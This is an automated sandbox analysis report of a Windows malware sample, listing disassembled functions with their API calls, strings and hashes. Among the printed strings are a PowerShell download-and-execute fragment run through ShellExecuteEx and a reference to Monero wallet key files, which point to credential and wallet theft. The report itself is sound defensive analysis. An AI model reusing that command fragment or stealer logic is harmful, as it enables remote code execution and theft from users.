                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: String___crt$Typememset
                  • String ID:
                  • API String ID: 3530896902-3916222277
                  • Opcode ID: d85a555e3f06d04283034fe51e08fd84e513a610208d8a436471fcb47bf24b3c
                  • Instruction ID: b78207577cc7606113f756cb34d2dbf94e4998091fd27d78479772848a0b97c1
                  • Opcode Fuzzy Hash: d85a555e3f06d04283034fe51e08fd84e513a610208d8a436471fcb47bf24b3c
                  • Instruction Fuzzy Hash: 7D4107B150075C9FEB218B24CE84FFB7BEC9F45714F1444E8E98A86182E2719A44CF20
                  Function 009B4780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                  Download Yara Rule
                  APIs
                  • lstrcat.KERNEL32(?,015EED70), ref: 009B47DB
                    • Part of subcall function 009B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009B8E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 009B4801
                  • lstrcat.KERNEL32(?,?), ref: 009B4820
                  • lstrcat.KERNEL32(?,?), ref: 009B4834
                  • lstrcat.KERNEL32(?,015DCCC0), ref: 009B4847
                  • lstrcat.KERNEL32(?,?), ref: 009B485B
                  • lstrcat.KERNEL32(?,015EE468), ref: 009B486F
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009B8D90: GetFileAttributesA.KERNEL32(00000000,?,009A1B54,?,?,009C564C,?,?,009C0E1F), ref: 009B8D9F
                    • Part of subcall function 009B4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 009B4580
                    • Part of subcall function 009B4570: RtlAllocateHeap.NTDLL(00000000), ref: 009B4587
                    • Part of subcall function 009B4570: wsprintfA.USER32 ref: 009B45A6
                    • Part of subcall function 009B4570: FindFirstFileA.KERNEL32(?,?), ref: 009B45BD
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                  • String ID:
                  • API String ID: 2540262943-0
                  • Opcode ID: 6d19fd8f2c5ceffdc3026d2221223d4daf8070acb7cf8567dcb22f7500347e10
                  • Instruction ID: 81847dde2cdc95e8919737db102ef0a33e5cac0519d3a89446b8e7b707d0cf9e
                  • Opcode Fuzzy Hash: 6d19fd8f2c5ceffdc3026d2221223d4daf8070acb7cf8567dcb22f7500347e10
                  • Instruction Fuzzy Hash: 833153B690021867DB14FBB0DCC9FEE737CAB98700F404989B35997091EE74A789CB95
                  Function 009B2C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA920: lstrcpy.KERNEL32(00000000,?), ref: 009BA972
                    • Part of subcall function 009BA920: lstrcat.KERNEL32(00000000), ref: 009BA982
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 009B2D85
                  Strings
                  • <, xrefs: 009B2D39
                  • ')", xrefs: 009B2CB3
                  • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 009B2CC4
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 009B2D04
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                  • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  • API String ID: 3031569214-898575020
                  • Opcode ID: eab2587f7fd2d1c8ac0d5b04152d1254c79f096205e949ca1431bdbc4bb60a31
                  • Instruction ID: 659df8fc547b478d97c2a3b0911c9e95b39816da26cdb068b0839fe5ca97a3b7
                  • Opcode Fuzzy Hash: eab2587f7fd2d1c8ac0d5b04152d1254c79f096205e949ca1431bdbc4bb60a31
                  • Instruction Fuzzy Hash: 5441C171C10208AADB14FFA0C9A1FDDB778AF94710F404119F116BB191DF746A4ACF96
                  Function 009A9E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                  Download Yara Rule
                  APIs
                  • LocalAlloc.KERNEL32(00000040,?), ref: 009A9F41
                    • Part of subcall function 009BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009BA7E6
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$AllocLocal
                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                  • API String ID: 4171519190-1096346117
                  • Opcode ID: 0f4981b2ddd7b634601b0a315699f3caa6c815ab83c0089007dd9c97099ad353
                  • Instruction ID: 3a03465ef09c6b3e9158c84fe99361390422a42bdb76c076e5fcf62edfc4e411
                  • Opcode Fuzzy Hash: 0f4981b2ddd7b634601b0a315699f3caa6c815ab83c0089007dd9c97099ad353
                  • Instruction Fuzzy Hash: 3C613E70A00248EBDB24EFA4CD96FED77B9AF85314F008418F90A5F591EF746A05CB92
                  Function 009B6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                  Download Yara Rule
                  APIs
                  • GetSystemTime.KERNEL32(?), ref: 009B696C
                  • sscanf.NTDLL ref: 009B6999
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009B69B2
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009B69C0
                  • ExitProcess.KERNEL32 ref: 009B69DA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Time$System$File$ExitProcesssscanf
                  • String ID:
                  • API String ID: 2533653975-0
                  • Opcode ID: 0c62e64857ab64e12644d3088538fe38cf95b6e2085fbb1ac359f60795da64eb
                  • Instruction ID: a6b44ec14b3be8956de3e931900c90617c94d464e3d4bb57c76c0d153ac2b4f0
                  • Opcode Fuzzy Hash: 0c62e64857ab64e12644d3088538fe38cf95b6e2085fbb1ac359f60795da64eb
                  • Instruction Fuzzy Hash: 6221CB75D14209ABCF04EFE4D985AEEB7B9FF48300F04852AE406E7250EB346609CB69
                  Function 009B7E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009B7E37
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009B7E3E
                  • RegOpenKeyExA.ADVAPI32(80000002,015DCA08,00000000,00020119,?), ref: 009B7E5E
                  • RegQueryValueExA.ADVAPI32(?,015EE588,00000000,00000000,000000FF,000000FF), ref: 009B7E7F
                  • RegCloseKey.ADVAPI32(?), ref: 009B7E92
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: ff23914b681088e7d0526df9f83198d565ab8a3086f58c8d90dd07a4ae21f0ff
                  • Instruction ID: b59b3bf4ee8f469e853a9f833941497dd98d07098f51ccb07c7fdb14a67eea0a
                  • Opcode Fuzzy Hash: ff23914b681088e7d0526df9f83198d565ab8a3086f58c8d90dd07a4ae21f0ff
                  • Instruction Fuzzy Hash: F71151B1A44245EBD710CFD4DD89FBBFBBCEB44710F104259F605AB290DB7869008BA2
                  Function 009B9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                  Download Yara Rule
                  APIs
                  • StrStrA.SHLWAPI(015EED28,?,?,?,009B140C,?,015EED28,00000000), ref: 009B926C
                  • lstrcpyn.KERNEL32(00BEAB88,015EED28,015EED28,?,009B140C,?,015EED28), ref: 009B9290
                  • lstrlen.KERNEL32(?,?,009B140C,?,015EED28), ref: 009B92A7
                  • wsprintfA.USER32 ref: 009B92C7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpynlstrlenwsprintf
                  • String ID: %s%s
                  • API String ID: 1206339513-3252725368
                  • Opcode ID: 401da857aae23dc8707ba5881e0ccace76c94312e03cfca7a4c3f8f1e0c8b813
                  • Instruction ID: dc3677cc9ad192a52f04d703d9d65fab2934a1bfd76bc48db0b8b8c0d0bc8cf3
                  • Opcode Fuzzy Hash: 401da857aae23dc8707ba5881e0ccace76c94312e03cfca7a4c3f8f1e0c8b813
                  • Instruction Fuzzy Hash: 9A01C875900148FFCB04DFECC988EAE7BBDEF48354F108588F9099B204CA31AA40DB92
                  Function 009A12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009A12B4
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009A12BB
                  • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009A12D7
                  • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009A12F5
                  • RegCloseKey.ADVAPI32(?), ref: 009A12FF
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateCloseOpenProcessQueryValue
                  • String ID:
                  • API String ID: 3225020163-0
                  • Opcode ID: 7ddf20ba7ff83f0e411c95e2d8ed1ba901d41df3a51bf37be7bdcd7dd0200e57
                  • Instruction ID: 3a7a66a467c3dbcf0e2d3e0197b2939a8c4596e23fdb7a1133190543327ce278
                  • Opcode Fuzzy Hash: 7ddf20ba7ff83f0e411c95e2d8ed1ba901d41df3a51bf37be7bdcd7dd0200e57
                  • Instruction Fuzzy Hash: 7A0136B5A40208BBDB00DFD0DC89FAEB7BCEB48701F008155FA059B2C0DA74AA018F51
                  Function 009B6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                  Download Yara Rule
                  APIs
                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 009B6663
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                  • ShellExecuteEx.SHELL32(0000003C), ref: 009B6726
                  • ExitProcess.KERNEL32 ref: 009B6755
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                  • String ID: <
                  • API String ID: 1148417306-4251816714
                  • Opcode ID: 0a514751a0c94460cd861b7dceff3123d84ee683917a434c51a049ff38750abe
                  • Instruction ID: ba06a9df4700fe383c432d30b78d8d92ccee42940412d093bd7426032ea0bf81
                  • Opcode Fuzzy Hash: 0a514751a0c94460cd861b7dceff3123d84ee683917a434c51a049ff38750abe
                  • Instruction Fuzzy Hash: C03129B1801218AADB14EB90DD96BDEB77CAF88310F804189F20967191DF746B48CF6A
                  Function 009B87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,009C0E28,00000000,?), ref: 009B882F
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009B8836
                  • wsprintfA.USER32 ref: 009B8850
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                  • String ID: %dx%d
                  • API String ID: 1695172769-2206825331
                  • Opcode ID: fcb4c7b99e0c152f7bbf30f8cbbbc24f80a1d1317b3945e356bc2cb3e31bc233
                  • Instruction ID: ac111fbd60053d5baf4bd1977aad32f807cdf03961a5fa6705c1eaed017590b5
                  • Opcode Fuzzy Hash: fcb4c7b99e0c152f7bbf30f8cbbbc24f80a1d1317b3945e356bc2cb3e31bc233
                  • Instruction Fuzzy Hash: 8F2133B1A40244AFDB04DF94DD85FAEBBB8FB48711F104119F505AB280CB796901CBA2
                  Function 009B8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,009B951E,00000000), ref: 009B8D5B
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009B8D62
                  • wsprintfW.USER32 ref: 009B8D78
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
